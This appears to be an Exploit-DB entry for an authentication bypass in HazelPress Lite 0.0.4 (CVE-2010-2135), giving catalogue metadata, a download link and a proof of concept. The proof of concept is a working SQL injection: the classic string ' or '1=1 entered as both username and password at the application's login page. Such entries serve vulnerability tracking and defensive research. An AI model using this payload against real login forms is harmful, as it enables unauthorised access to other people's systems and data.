HazelPress Lite 0.0.4 - Authentication Bypass

Author: cr4wl3r
type: webapps
platform: php
port: 
date_added: 2010-02-27  
date_updated:   
verified: 1  
codes: OSVDB-65129;CVE-2010-2135  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comHazelPress_0_0_4_.zip  

raw file: 11602.txt  

# HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1